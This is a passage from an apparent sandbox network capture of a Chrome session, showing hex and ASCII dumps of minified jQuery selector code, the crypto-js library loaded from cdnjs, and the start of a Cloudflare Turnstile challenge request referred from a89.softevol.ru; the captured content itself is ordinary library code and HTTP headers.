                                                                2025-01-10 21:29:02 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                2025-01-10 21:29:02 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                2025-01-10 21:29:02 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                2025-01-10 21:29:02 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                2025-01-10 21:29:02 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                2025-01-10 21:29:02 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.849728104.17.24.144431668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 21:29:02 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                Host: cdnjs.cloudflare.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-10 21:29:02 UTC962INHTTP/1.1 200 OK
                                                                Date: Fri, 10 Jan 2025 21:29:02 GMT
                                                                Content-Type: application/javascript; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Cache-Control: public, max-age=30672000
                                                                ETag: W/"61182885-40eb"
                                                                Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                cf-cdnjs-via: cfworker/kv
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Timing-Allow-Origin: *
                                                                X-Content-Type-Options: nosniff
                                                                CF-Cache-Status: HIT
                                                                Age: 202353
                                                                Expires: Wed, 31 Dec 2025 21:29:02 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K0r02lPlQnebWZaYuAGQF7IUYAi94KbKbj6%2Fsk%2F5rf7Iju4vaB9u00ycOXEKT%2Bq5NsNrVLjorX75iKGm86F0cvSrP4s6%2Fi1qJV9Ven0kq3SDm4dR9aN%2FzHSxrWN2iav6nJOdRyC8"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                Strict-Transport-Security: max-age=15780000
                                                                Server: cloudflare
                                                                CF-RAY: 8fffc29eb8a34297-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-10 21:29:02 UTC407INData Raw: 33 39 37 37 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                Data Ascii: 3977!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                2025-01-10 21:29:02 UTC1369INData Raw: 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e
                                                                Data Ascii: peof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.
                                                                2025-01-10 21:29:02 UTC1369INData Raw: 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79
                                                                Data Ascii: ne.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBy
                                                                2025-01-10 21:29:02 UTC1369INData Raw: 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b
                                                                Data Ascii: =typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;
                                                                2025-01-10 21:29:02 UTC1369INData Raw: 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d
                                                                Data Ascii: or(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]
                                                                2025-01-10 21:29:02 UTC1369INData Raw: 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c
                                                                Data Ascii: :0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|
                                                                2025-01-10 21:29:02 UTC1369INData Raw: 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66
                                                                Data Ascii: ffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringif
                                                                2025-01-10 21:29:02 UTC1369INData Raw: 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d
                                                                Data Ascii: r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLM
                                                                2025-01-10 21:29:02 UTC1369INData Raw: 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d
                                                                Data Ascii: bs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=
                                                                2025-01-10 21:29:02 UTC1369INData Raw: 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31
                                                                Data Ascii: 39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,1


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.849730104.18.94.414431668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 21:29:03 UTC795OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/wd4yk/0x4AAAAAAA3OlbOSAWayoimi/auto/fbE/normal/auto/ HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                sec-ch-ua-platform: "Windows"
                                                                Upgrade-Insecure-Requests: 1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: navigate
                                                                Sec-Fetch-Dest: iframe
                                                                Referer: https://a89.softevol.ru/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-10 21:29:03 UTC1362INHTTP/1.1 200 OK
                                                                Date: Fri, 10 Jan 2025 21:29:03 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Content-Length: 26635
                                                                Connection: close
                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
